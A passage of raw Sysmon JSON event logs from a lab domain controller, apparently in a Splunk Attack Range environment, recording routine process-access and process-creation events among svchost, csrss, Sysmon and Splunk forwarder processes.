C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010F2581100}","TargetProcessId":"2276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nProcessGuid: {A837DB8D-04D6-5F25-0000-0010625E1100}\r\nProcessId: 2672\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","ProcessGuid":"{A837DB8D-04D6-5F25-0000-0010625E1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010198B1000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010198B1000}","TargetProcessId":"2672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010198B1000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010198B1000}","TargetProcessId":"2672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 